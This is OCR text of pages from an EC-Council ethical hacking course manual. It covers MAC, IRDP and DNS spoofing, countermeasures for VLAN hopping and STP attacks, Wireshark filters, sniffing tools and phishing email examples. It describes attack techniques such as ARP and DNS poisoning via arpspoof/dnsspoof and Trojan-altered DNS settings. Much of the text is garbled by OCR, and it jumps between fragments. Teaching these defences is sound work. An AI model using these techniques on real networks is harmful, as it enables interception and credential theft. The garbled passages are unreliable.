Change MAC Address (https://lizardsystems.com) Easy Mac Changer (https://github.com) Spoof-Me-Now (https://sourceforge.net)
Module 08 Page 1277
Ethical Hacking and Countermeasures Copyright © by EC-Cout
All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
IRDP Spoofing
CE H
@ ICMP Router Discovery Protocol (IRDP) is a routing protocol that allows a host to discover the IP addresses of active routers on their subnet by listening to router advertisement and soliciting messages on their network @ The attacker sends a spoofed IRDP router advertisement message to the host on the subnet, causing it to change its default router to whatever the attacker chooses
‘@ This attack allows the attacker to sniff the traffic and collect valuable information from the packets @
Attackers can use IRDP spoofing to launch man-in-the-middle, denial-of-service, and passive sniffing attacks
ce
Internet
Routing Table Strictly Prohibited
IRDP Spoofing ICMP Router Discovery Protocol (IRDP) is a routing protocol that allows a host to discover the IP addresses of active routers on its subnet by listening to router advertisement and solicitation messages on its network. The attacker can add default route entries on a system remotely by spoofing router advertisement messages. As IRDP does not require any authentication, the target host will prefer the default route defined by the attacker over the default route provided by the DHCP server. The attacker accomplishes this by setting the preference level and lifetime of the route at high values to ensure that the target hosts will choose it as the preferred route. This attack succeeds if the attacker launching the attack is on the same network as the victim. In the case of a Windows system configured as a DHCP client, Windows checks the received router advertisements for entries. If there is only one, then it checks whether the IP source address is within the subnet. If so, then it adds the default route entry; otherwise, it ignores the advertisement.
User
<
‘Traffic Sent with IP 10.10.10.2 Mac C
10.10.10.2 MACB
How to Defend Against MAC
Sent 10.10.10.5 Mac B
[ila fEamanen =
10.10.10.5 MAC C
Received Traffic Source IP 10.10.10.2 Mac B
Spoofing
Performing security assessments is the primary aim of an ethical hacker. An ethical hacker attacks a target network or organization with the knowledge and authorization of its management, to find loopholes in the security architecture. However, the job does not end there. Finding those loopholes is a minor task. The most crucial task of ethical hacking is to apply the appropriate countermeasures to security loopholes to fix them. Once you have tested the network for you should apply countermeasures to MAC spoofing countermeasures can be Apply the appropriate countermeasures
MAC spoofing attacks and collected security loopholes, protect the network from further MAC spoofing. Many applied to specific network architectures and loopholes. to your network.
To detect MAC spoofing, it is necessary to know all the MAC addresses in the network. The best way to defend against MAC address spoofing is to place the server behind the router. This is because routers depend only on IP addresses, whereas switches depend on MAC addresses for communication in a network. Making changes to the port security interface configuration is another way to prevent MAC spoofing attacks. Once you enable the port-security command, it allows you to specify the MAC address of the system connected to the specific port. It also allows for specific action to be taken if a port security violation occurs.
You can also implement attacks: =
the following techniques to defend
against MAC
address
spoofing
DHCP Snooping Binding Table: The DHCP snooping process filters untrusted DHCP messages and helps to build and bind a DHCP binding table. This table contains the MAC address, IP address,
lease time, binding type, VLAN
to correspond
untrusted
Module 08 Page 1284
with
interfaces
number,
of a switch.
and interface information
It acts
as a firewall
between
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
untrusted hosts and DHCP servers. It also helps in differentiating between trusted and untrusted interfaces. =
Dynamic ARP Inspection: The system checks the IP-MAC address binding for each ARP packet in a network. While performing a DAI, the system will automatically drop invalid IP—MAC address bindings.
=
IP Source Guard: IP Source Guard is a security feature in switches that restricts the IP traffic on untrusted layer 2 ports by filtering traffic based on the DHCP snooping binding database. It prevents spoofing attacks when the attacker tries to spoof or use the IP address of another host.
=
Encryption: Encrypt the communication prevent MAC spoofing.
=
Retrieval of MAC Address: You should always retrieve the MAC address from the NIC directly instead of retrieving it from the OS.
=
Implementation of IEEE 802.1X Suites: This is a type of network protocol for port-based Network Access Control (PNAC), and its main purpose is to enforce access control at the point where a user joins the network.
=
AAA (Authentication, Authorization, and Accounting): Use an AAA (Authentication, Authorization, and Accounting) server mechanism to filter MAC addresses subsequently.
sh ip dhcp snooping binding Mackddress IpAddress Lease = Type 2a:33:4e:2£;4a:1e 10.10.10.9 185235 dhep-
snooping
VLAN. 4
between
the access point and computer
Interface FastEthernet3/18
to
10.10.10.1 MACA
DHCP Snooping Enabled Dynamic ARP Inspection Enabl
IFIP and MAC entry in the binding table does not match, then discard the packet Traffic Sent with IP 10.10.10.5 Mac B
10.10.10.2 MACB
10.10.10.5 MAC Cc if the traffic from the
, then traffic is blocked
Figure 8.47: Defending against MAC spoofing
Module 08 Page 1285
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
How to Defend Against VLAN Hopping Defend against Switch Spoofing
Defend against Double Tagging
@ Explicitly configure the ports as access ports and ensure that all access ports are
@
—)
configured not to negotiate trunks:
oP
switchport mode access
ee
switchport mode nonegotiate
—y
Ensure that all trunk ports are configured
not to negoti -gotiate trunks: Switch (config-if)#
trunk
CE H
Lame
switchport mode
Switch (config-if)# switchport mode nonegotiate
@==@
@ Ensure that each access port is assigned with VLAN except the default VLAN (VLAN 1): switchport access vlan 2 ‘@
Ensure that the native VLANs on all trunk
ports are changed to an unused VLAN ID: switchport
‘@
eH
trunk
native
vlan
999
Ensure that the native VLANs on all trunk
ports are explicitly tagged:
vlan dotlq tag native
How to Defend Against VLAN Hopping Defend Against Switch Spoofing Perform the following steps to configure a switch to prevent switch spoofing attacks: =
=
Explicitly configure the ports as access configured not to negotiate trunks: switchport
mode
access
switchport
mode
nonegotiate
ports,
and
ensure
that all access
ports are
Ensure that all trunk ports are configured not to negotiate trunks: switchport
mode
trunk
switchport
mode
nonegotiate
Defend Against Double Tagging Perform the following steps to configure a switch to prevent double tagging attacks: =
Ensure that each access port is assigned with VLAN except the default VLAN (VLAN 1): switchport
=
vlan
2
Ensure that the native VLANs on all trunk ports are changed to an unused VLAN ID: switchport
=
access
trunk
native
vlan
999
Ensure that the native VLANs on all trunk ports are explicitly tagged: vlan
Module 08 Page 1286
dotlq
tag
native
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
C'EH
How to Defend Against STP Attacks To prevent an STP attack, the following security features must be implemented: BPDU Guard
Loop Guard
@ Toenable the BPDU guard on all PortFast edge
@ Toenable the loop guard on an interface:
ports: configure terminal interface gigabiteethernet slot/port
spanning-tree
portfast
configure terminal interface gigabiteethernet slot/port
bpduguard
spanning-tree
Root Guard
‘@
loop
UDLD (Unidirectional Link Detection)
To enable the root guard feature on an
‘@
interface:
configure
guard
terminal
interface gigabiteethernet slot/port spanning-tree guard root
To enable UDLD on an interface: configure
terminal
interface
gigabiteethernet
udld { enable }
| disable
slot/port
| aggressive
Strictly Prohibited
How to Defend Against STP Attacks Implement the following countermeasures to defend against STP attacks on switches: BPDU Guard: BPDU guard must be BPDU from their connected devices. PortFast-enabled ports. This feature network. If BPDU guard is enabled connects
enabled on the ports that should never receive a This is used to avoid the transmission of BPDUs on helps in preventing potential bridging loops in the on a switch interface and an unauthorized switch
to it, the port will be set to errdisable
errdisable traffic.
mode
shuts down
mode
the port and disables
when
it from
a BPDU
is received. The
sending or receiving any
Use the following commands to enable BPDU guard on a switch interface: configure
terminal
interface
gigabiteethernet
spanning-tree
portfast
slot/port
bpduguard
Root Guard: Root guard protects the root bridge and ensures that it remains as the root in the STP topology. It forces the interfaces to become the designated ports (forwarding ports) to prevent the nearby switches from becoming root switches. Therefore, if a port enabled with the root guard feature receives a superior BPDU, it converts that port into a loop inconsistent state (not errdisabled), thus protecting an STP topology change. This port remains inactive only for that specific switch/switches attempting to change the STP topology. This port remains in down state until the issue is resolved.
Module 08 Page 1287
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
Use the following commands to enable the root guard feature on a switch interface: configure
terminal
interface
gigabiteethernet
spanning-tree
=
guard
slot/port
root
Loop Guard: Loop guard improves the stability of the network by preventing it against the bridging loops. It is generally used to protect against a malfunctioned switch. Use the following commands to enable the loop guard feature on a switch interface: configure
terminal
interface
gigabiteethernet
spanning-tree
=
guard
slot/port
loop
_UDLD (Unidirectional Link Detection): UDLD enables devices to detect the existence of unidirectional links and further disable the affected interfaces in the network. These unidirectional links in the network can cause STP topology loops. Use the following command to enable UDLD on a switch interface: configure
terminal
interface
gigabiteethernet
udld
Module 08 Page 1288
{
enable
|
disable
|
slot/port aggressive
}
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
DNS Poisoning Techniques @
C \EH
DNS poisoning is a technique that tricks a DNS server into believing that it has received authentic information
©@
It results in the substitution of a false IP address at the
‘@ The attacker can create fake DNS entries for the
when it has not received any @
DNS level where the web addresses are converted into numeric IP addresses
Itallows the attacker to replace IP address entries for a target site on a given DNS server with the IP
address of the server he/she controls
server (containing malicious content) with names similarto that of the target server
Intranet DNS
DNS Server
re
Internet DNS Spoofing (Remote network)
‘Spoofing (Local network) DNS Cache Poisoning
Proxy Server >» DNS Poisoning
Sniffing Technique: DNS Poisoning This section describes DNS poisoning techniques to sniff the DNS traffic of a target network. Using this technique, an attacker can obtain the ID of the DNS request by sniffing and can send a malicious reply to the sender before the actual DNS server responds.
DNS Poisoning Techniques DNS is the protocol that translates a domain name (e.g., www.eccouncil.org) into an IP address (e.g., 208.66.172.56). The protocol uses DNS tables that contain the domain name and its equivalent IP address stored in a distributed large database. In DNS poisoning, also known as DNS spoofing, the attacker tricks a DNS server into believing that it has received authentic information when, in reality, it has not received any. The attacker tries to redirect the victim to a malicious server instead of the legitimate server. The attacker does this by manipulating the DNS table entries in the DNS. This results in substitution of a false IP address at the DNS level,
where web addresses are converted into numeric IP addresses.
When the victim tries to access a website, the attacker manipulates the entries in the DNS table so that the victim’s system redirects the URL to the attacker’s server. The attacker replaces IP address entries for a target site on a given DNS server with the IP address of the server (malicious server) he/she controls. The attacker can create fake DNS entries for the server (containing malicious content) with the same names as that of the target server. Thus, the victim connects to the attacker’s server without realizing it. Once the victim connects to the attacker’s server, the attacker can compromise the victim’s system and steal data.
Module 08 Page 1289
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
DNS poisoning is possible using the following techniques: =
Intranet DNS Spoofing
=
Internet DNS Spoofing
=
Proxy Server DNS Poisoning
=
DNS Cache Poisoning
Module 08 Page 1290
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Intranet DNS Spoofing
CE H
@ In this technique, the attacker's system must be connected to the local area network (LAN) and be able to sniff packets ‘@
It works well against switches with ARP Poison Routing
Whatis the
Router 1P 10.0.0.254
address of ras com?
John
A
sees,
(P:10.0.0.3) ?
‘ Website Real wwwxsecurty.com
router and redirects DNS requests to his machine
a
‘Attacker sniffs th
islocated at
DNS Response
Attacker runs
arpspoof/dnsspoof
Fake Website
Intranet DNS Spoofing An attacker can perform an intranet DNS spoofing attack on a switched LAN with the help of the ARP poisoning technique. To perform this attack, the attacker must be connected to the LAN and be able to sniff the traffic or packets. An attacker who succeeds in sniffing the ID of the DNS request from the intranet can send a malicious reply to the sender before the actual DNS
server.
The diagram describes how an attacker performs an intranet DNS spoofing.
What is the IPeddress of
Router
www. xsecurity.com?-
A John (IP: 10.0.0.3)
IP 10.0.0.254
: -@ seve ae Rete eee sey a
Real Website
www.xsecurity.com IP: 200.0.0.45
a a A
th Attacker hnocts Sees (4) router and redirects |DNS requeststo his machine
i sniffs theand # Attackersential
an‘ redirectscredential the request
www xsecurity.com 1s located at
DNS Response
Attacker runs
arpspoof/dnsspoof
Fake Website
Figure 8.48: Intranet DNS spoofing
In the diagram, the attacker poisons the router by running arpspoof/dnsspoof to redirect DNS requests of clients to the attacker’s machine. When a client (John) sends a DNS request to the router, the poisoned router sends the DNS request packet to the attacker’s machine. Upon Module 08 Page 1291
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
receiving the DNS request, the attacker sends a fake DNS response that redirects the client to a fake website set up by the attacker. The attacker owns the website and can see all the information submitted by the client to that website. Thus, the attacker can sniff sensitive data, such as passwords, submitted to the fake website. The attacker retrieves the required information and then redirects the client to the real website.
Module 08 Page 1292
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
CEH
Internet DNS Spoofing ‘@
Internet DNS Spoofing, the attacker infects John’s machine with a Trojan and changes his DNS IP address
:
to that of the attacker's
Whatis the addressof ww security com?
John’s Browser connects to 65.0.0.2
so E ‘Attacker sniffs the credential and redirects the requestto realwebsite
Fake Website
(1P: 10.0.0.
1P:65.0.0.2
Real Wel
www.xsecurity.com IP: 200.0.0.45,
DNSRequest } to200.0.02
‘Attacker infects John's computer by ‘changing his DNS IP address to 200.0.0.2
Attacker runs DNS Server
_
(IP: 200.0.0.2)
Internet DNS Spoofing Internet DNS poisoning is also known as remote DNS poisoning. Attackers can perform DNS spoofing attacks on a single victim or on multiple victims anywhere in the world. To perform this attack, the attacker sets up a rogue DNS server with a static IP address. Attackers perform Internet DNS spoofing with the help of Trojans when the victim’s system connects to the Internet. This is an MITM attack in which the attacker changes the primary DNS entries of the victim’s computer. The attacker replaces the victim’s DNS IP address with a fake IP address that resolves to the attacker’s system. Thus, the victim’s traffic redirects to the attacker’s system. At this point, the attacker can easily sniff the victim’s confidential information.
The figure illustrates an attacker performing Internet DNS spoofing. The attacker infects John’s machine with a Trojan and changes his DNS IP address to that of the attacker. Whats the iPadaress of wor xscurty com? oe
John's Browser
(1P: John 10.0.0.5)
Attacker sniff the eredem and redirects the request to
Fake Website IP: 65.002
cha
DNS IP address to 200.0.0.2
-O-
realwebsite
>
q
a o
Real Website
Attacker runs DNS Server (IP: 200.0.0.2)
Figure 8.49: Internet DNS Spoofing
Module 08 Page 1293
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
CEH
Proxy Server DNS Poisoning @ The attacker sends a Trojan to John’s machine that changes his proxy server settings in Internet Explorer to that of the attacker's and redirects to the fake website Whatis the address of wun gecurity com?
o
John
Real Website www.xsecurity.com (1P:200.0.0.45)
a a
‘Attacker’s fake website sn the credential and redirectsthe request to the real websit
A
‘computer by changing his IE Proxy address to 200.0.0.2
zy
request to the Fake webs!
Fake Website
Attacker runs Proxy Server 1P: 200.0.0.2
(IP:65.0.0.2)
Strictly Prohibited
Proxy Server DNS Poisoning In the proxy server DNS poisoning technique, the attacker sets up a proxy server on the attacker’s system. The attacker also configures a fraudulent DNS and makes its IP address a primary DNS entry in the proxy server. The attacker changes the proxy server settings of the victim with the help of a Trojan. The proxy serves as a primary DNS and redirects the victim’s traffic to the fake website, where the attacker can sniff the confidential information of the victim and then redirect the request to the real website. As shown in the figure, an attacker sends a Trojan to John’s machine that changes his proxy server settings in Internet Explorer to those of the attacker, and redirects the request to a fake website. ‘Whats the address of www xsecurty.com?
: o
Real Website
John
Attacker's fake website sniffs =
the eredential and redirects the # request to the real website !
(IP: 10.0.0.5)
@
All of John’s Web requests go through Attacker’s machi Attacker infects John’s computer by changing his IE Proxy address to 200.0.0.2
Attacker sends John’s, request to the Fake website
Attacker runs Proxy Server IP: 200.0.0.2
Fake Website (IP: 5.0.0.2)
Figure 8.50: Proxy server DNS poisoning
Module 08 Page 1294
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
DNS Cache Poisoning
CE H
@ DNS cache poisoning refers to altering or adding forged DNS records into the DNS resolver cache so that a DNS query is redirected to a malicious site G
If the DNS resolver cannot validate that the DNS responses have been received from an authoritative source, it will cache the incorrect entries locally, and serve them to users who make a similar request
Whatis the \Paddress of wwewssecuriy.com?
Authoritative DNS server for xsecutity.com
ee a
‘Attacker's fake websit 46A4026/sM1™ > Form iter: *VIEWSTATEGENERATOR™ = "CZEE9ABS" > Form item: *EVENTVALIDATION" = "/wEdAARJUUDOrbpOx NM xt™ LARHNE CRU 9a£308910en0G6cPO02LAKSaxRe6 MQ} 2F3 SAWSKUgaKANSGXTZREGO7OLAP> Form ites: > Form ites: > Form ites: (0630 HEME] 19 70 G0 06 So 4F 52 S4 20 2F 20 48 S454 Bp PO ST / © 7 The window size value from the TCP header (tcp.window size valuel.2 bytes Packets: 1793 - Displayed: 69 (3.8%) - Dropped: 0 (0.0%) Profle: Default Figure 8.54: Wireshark capturing TCP Stream
(ERE
eeeS ORT |
sebeeZeGPeececdeeceeke
MTT 4.4 Host! wm.moviescope.com User-Agent: Mozilla/5.0 (Windows NT 10. rv: 8) Gecko/20100101 Firetox/78.9 ‘Accept: text/ntml, application/xntal+xnl, application/xal;q=0 image/webp, */*;Q=0. ‘Accept-Language: en-US, en;q-0.5 ‘Accept-Encoding: gzip, deflate Content-Type: application/x-vaw-forn-urlencoded Content-Lengtn: 324 Origin: nttp://wa.moviescope.com ONT: 4 Connection: keep-alive Referer Nttp://me.noviescope.con/ Upgr: Insecure-Requests: 1 DzONIES ESMOCSN 120T dkZHS LOcnIK2BBt sUTE SHAZFWLGLEGTSuM __VIEWSTATE=S2F wEPOMILLT W18__VIEWSTATEGENERATOR=C2EE' EVENTVALIDATION=%2F wEdAAR JUUDSr DpOx NNN) xtMLURWMEtrRu 119aE308g1Dcn0G6cPO0; \3qX7ZRFQOTELoPacunnsgi 33) 16UFNCYULY Yentx221Qv0B9U%3Dat| enLogin=LoginkTTP/1.1 382 Found Cache-Controt: prival Content-Type: text/html; charset Location: /index.aspx Server: Microsoft -11S/19.8 8, 30319 Date: Wed, 18 May 2022 12:50:53 GHT Content-Length: 128
chead>ddject movede/titten in2nthdart med tn ch hrafe*/indaw asmetwhernefam) ¢K2%
16 chent pits, 24 server pts 31 turns
Entire conversation (S46kB) Find: Filter Out This Stream
= Show data as ASCII Print
|| Save as
Back
= Stream |25 |= [Find Next | Xcose | F {Help
Figure 8.55: Password revealed in a TCP Stream Module08 Page 1304
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Display Filters in Wireshark
CE H
Display filters are used to change the view of packets in the captured files
EB
Display
ritesingby
|
Protocol
Monitoring
example: Type the protocol in the filter box; arp, http, tcp, udp, ds, or ip © top.port==23
[2 |
theSpecific
ER
Filtering by
wouter Addresses
| Eicisr T iolo.o's
[4 |
IPFiltering Addressby
|
ip addr == 10.0.0.4
|
© ip.dst == 10.0.1.50 && frame.pkt_len > 400 p && frame.number > 15 && frame.number < 30 esip.addr == 10.0.1.12 && icmemp
|
Ports
92.168.1.100 machine
92.168.1.100
&& tcp.port==23
ip.addr == 10.0.0.4 or
Other Filters
5 |
9
@ ip. sro==205.153.63.30 or ip.dst==205.153.63.30
Display Filters in Wireshark Source: https://wiki.wireshark.org Wireshark features display filters that filter traffic address, port, etc. Display filters are used to change set up a filter, type the protocol name, such as arp, of Wireshark. Wireshark can use multiple filters at a
on the target network by protocol type, IP the view of packets in the captured files. To http, tcp, udp, dns, and ip, in the filter box time.
Some of the display filters in Wireshark are listed below:
=
Display Filtering by Protocol Example: Type the protocol in the filter box: arp, http, tcp, udp, dns, ip
=
Monitoring the Specific Ports Oo
tep.port==23
192.168.1.100 machine 192.168.1.100 && tcp.port==23
°
=
Filtering by Multiple IP Addresses ©
=
==
10.0.0.4
or
ip.addr
==
10.0.0.5
&&
frame.pkt_len
Filtering by IP Address Oo
=
ip.addr ip.addr
==
10.0.0.4
Other Filters oO
ip.dst
©
ip.addr == 10.0.1.12 frame.number < 30
oO
ip.sre==205.153.63.30
Module 08 Page 1305
==
10.0.1.50
&& or
icmp
&&
>
400
frame.number
>
15
&&
ip.dst==205.153.63.30
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Additional Wireshark Filters
udp contains 33:27:58 Sets a filter for the HEX values of 0x33 0x27 OxS8 at any offset
tcp.analysis.
&
http. request Displays all HTTP GET requests Retransmission
Displays all retransmissions in the trace 5
tcp contains
3)
Displays all TCP resets
IX q
Lox]
tep. flags. reset==1
traffic
Displays all TCP packets that contain the word “traffic”
BS
o
CE H ! (arp or icmp or dns) Masks out arp, icmp, dns, or other protocols and allows you to view traffic of your interest tcp.port == 4000 Sets filter for any TCP packet with 4000 as a source or destination port tep.port eq 25 or icmp Displays only SMTP (port 25) and ICMP traffic ip.sre==192.168.0.0/16 and ip.dst==192.168.0.0/16 Displays only traffic in the LAN (192.168.x.x), between workstations and servers — no Internet ip.sre != xxx.xxx.xxx.xxx && ip.dst != 200K 200.2008. 200K 6 Sip Filterby a protocol (e.g. SIP) and filter out unwanted IPs
Additional Wireshark Filters Source: https://wiki.wireshark.org Some examples of additional Wireshark filters are listed below: ="
tcep.flags.reset==
Displays all TCP resets =
udp
contains
33:27:58
Sets a filter for the hex values of 0x33 0x27 0x58 at any offset ="
http.request
Displays all HTTP GET requests ="
tcp.analysis.retransmission
Displays all retransmissions in the trace =
tcp
contains
traffic
Displays all TCP packets that contain the word “traffic” =!
(arp
or
icmp
or
dns)
Masks out arp, icmp, dns, or other protocols and allows you to view the traffic of your
interest =
tcep.port
==
4000
Sets a filter for any TCP packet with 4000 as a source or destination port
Module 08 Page 1306
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
=
tcp.port
eq
25
or
icmp
Displays only SMTP (port 25) and ICMP traffic ="
ip.src==192.168.0.0/16
and
ip.dst==192.168.0.0/16
Displays only traffic in the LAN (192.168.x.x), between workstations and servers—no
Internet ="
aip.sre
!=
xxx.xxx.xxx.xxx
&&
ip.dst
XXX. XXX.XXX.xXxx
&&
Sip
Filters by a protocol (e.g., SIP) and filters out unwanted Ips
Module 08 Page 1307
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
CEH
Sniffing Tools Riverbed Packet Analyzer Plus
Riverbed Packet Analyzer Plus performs the realtime network packet analysis and reporting of large trace files
a portable network performance analysis and Capsa Portable | Capsa, diagnostics tool, provides packet capture and analysis Network Analyzer capabilities with an easy-to-use interface
oor m
Gamtmm 0s os oe Tntes Janu olosoR com
‘tps nnn riverbed com
CEH
Sniffing Tools (Cont’d)
RITA (Real Intelligence Threat Analytics)
OmniPeek
‘etps://w.actvecountermeasures.com
OmniPeeksniffer displaysa Google Mapin the OmniPeek capture window showing the locations of all the public IP addressesof captured packets
Observer Analyzer ‘tp: sivioltionscom PRTG Network Monitor ‘etps://wneu.pacsster.com SolarWinds Deep Packet
Inspection and Analysis -ps://un soled com
"tesa Bveaction com
Xplico ‘ntps://unosptcaorg
Sniffing Tools
Module 08 Page 1308
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
=
Exam 312-50 Certified Ethical Hacker
Riverbed Packet Analyzer Plus
Source: https://www.riverbed.com Riverbed Packet Analyzer Plus performs the real-time network packet analysis and reporting of large trace files using an intuitive GUI and a broad selection of pre-defined analysis views. Use Packet Analyzer Plus with Riverbed AppResponse or any locally presented trace files to quickly identify and troubleshoot complex network and application performance issues down to the bit level through full integration with Wireshark.
Boar R00
Tae-conrn Folder
Ad Trace Tiaceries
Devices ¥ FE cal System,
1 Wey Microsof Corporation (Ga Bardictn Over Time
B/9
- ax
renin
sms pis sx
@
paste sources
robes | Seich TigGetting rs on Gener
Started
.o8ony
ave
ry
Z
‘% Detach
ew
Chart
char Selection
«
Network Usage by Port Name Filters (None)
a
Total Throughput Wars
Wincicne
Sottos
4 Filters.
@ebss
Views “Custom ‘Local System ‘D Recently Use i Barcwicth Over Time IP Comersations Ba Network Usage Anatais
[i i Protocol Distsbution ITeatic Anadis lim bandwith Usage
Preicue 323% 250
i
cd
Simons mincicue
reps 230%) nits
Pd LAN and Network Multi-Segment Analysis MS mane (540%) formance and Errors * Notes alkers and Conversations Current Selection: 2134329 - 2134340 (11 s) @ 1 sec - Total Window: 21-4329 - 214330 - Drop After: 1 Day ‘Network Usage by Port Name on vifg0 at 9:43 PM. - Selected Chart: Total Throughput Figure 8.56: Screenshot of Riverbed Packet Analyzer Plus
Module08 Page 1309
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
Capsa Portable Network Analyzer
Source: https://www.colasoft.com Capsa, a portable network performance analysis and diagnostics tool, provides packet capture and analysis with an easy-to-use interface, allowing users to protect and monitor networks in a critical business environment. An attacker can use this tool to sniff packets from network vulnerabilities. iew
the target
network
and
OO
‘Analysis Settings
| Uiieation 629
detect
@ Hep
| Teffic Chartbps) | Packet Buffer 128.0 MB
TP Endpoiart nt[1
> Online Resource
a]
a
BW Protocol Explorer (1)
8D & By 4 WS &- ©
MACExplorer@) P explorer) VolP Explorer Process Explorer) Application Explorer ()
lick here Live Demo Find Top Takers in Netnork ho Is Using Network Bandwidth? How to Detect ARP Attacks How to Detect Netork Loop How to Monit IM Message [More Videos.-] How-To's
[Zl [Gy [iy [Gl Gl
Default | WD Ethemet ‘DyCapture-
- 1000Mbps J Bandwidth
"0 Ready Inactive 00:01:02 | ¥7482
a
How to Honitor Network Traffic Monitor Employee Website s Visits why? cannot capture ALL traffic, Create Traffic Utitzation Chart [entistart a wireless Capture [ More in Knowledgebase..]
How to Use Capsa
Dalam Explorer ©0
OO
v
OO
Figure 8.57: Screenshot of Capsa Portable Network Analyzer
Module 08 Page 1310
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures Sniffing =
Exam 312-50 Certified Ethical Hacker
OmniPeek
Source: https://www.liveaction.com OmniPeek Network Analyzer provides real-time visibility and expert analysis of each part of the target network. This tool will analyze, drill down, and fix performance bottlenecks across multiple network segments. Analytic plug-ins provide targeted visualization and search abilities within OmniPeek. The Google Maps plug-in enhances the analysis capabilities of OmniPeek. It displays a Google map in the OmniPeek capture window that shows the locations of all the public IP addresses of captured packets.
Attackers can use OmniPeek to monitor and analyze network traffic of the target network in real time, identify the source location of that traffic, and attempt to obtain sensitive information, as well as find any network loopholes. 2 omni Buffer usage: 0% Fiterstate:
[S¥~, Erterafter expression here une for heb)
Seaeonts pecs voce — 86co Capture
Accept all packets
e
ATID sath aaah adh ah Pa = Relative Tine Potocl pelle Destraton Packt) source (ERC ETT Dg fesersisisartife. Ey e.440251 TOPVE HDI? LRTSTOPVt |
al =a fies
3 Q Feber
4 @ fes0:
:15:sarfite.
1
:15:saeF: Fe.
178
1
Bonjot
90
1.533512 ICWPv6 NSoL
TEMP
94
1.760449 ICMPV6 MLDV2 LR
ToNPut
2.034218 ONS 2.105002 IGNP
Bonjot GHP
375
6g
web
4a fese::15:SaFF:Fe...
& wDNsvE
2
200
ran ‘weno avid
14 i FeBo::a5:5aeFite... iy mDNSVE 15 @ 10.10.1.14 Q 10"
1
78 6
one Calls
wnveda Peer crateMap statistics ‘Summary — palers pevkeatons aid
12 @ Fen0::6F09:F032:... al
8 7 packet Info racket Number @Scape orien @ Packet Length: Cleese SF Ethernet Tyoe 2 Destination WDee
@ Protocol Type:
BALL MLDV2-capabl.
(@.484933 ONS
-
=
2papers
Figure 9.3: Screenshot showing the phishing technique
Examples of Phishing Emails Source: https://cofense.com Today, most people use Internet banking. Many people use Internet banking for their financial needs such as online share trading and e-commerce. Phishing refers to the fraudulent acquisition of sensitive information such as passwords and credit-card details by masquerading as a trusted entity. The target receives an email that appears to be from the bank and requests the user to click on the URL or link provided. Today, even employees receive fraudulent phishing emails on security updates in their official email addresses. The victim is tricked into clicking on a malicious link in the email under the pretense of completing an update process. If the user is tricked and provides their username, password, and other information, then the site forwards the information to the attacker, who uses it for nefarious purposes.
Module09 Page 1354
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
File
Message
Developer
Exam 312-50 Certified Ethical Hacker
Help =
Tell me what you want to do
SY oie |eunc Deleteff Archive El) AssignBoMark Reply Reply Forward 6 nigrex ri
Respond
Gi
| rs
Delete
Posey Unread
Categorize Follow | Report
Tags
>
Upe | Phhing
5 Cofense
TT-PAYMENTCOPY 10587767 PDF "sale_automec@"
Ye: @1B@2olcom
com"
Forward ]
sm emy@ gmail.com>
Thuoa/10/2002
Dear Sir / Ma-am
‘We already transferred the money to your account. Kindly check and see attached files for your reference. Please also send us the necessary documents colored with signature and stamp (Invoice, Packing List, Certificate of Origin, Lead Free Certificate, Certificate of Analysis). Awaiting for your immediate action. = a
Figure 9.4: Screenshot showing a phishing email
File
Message
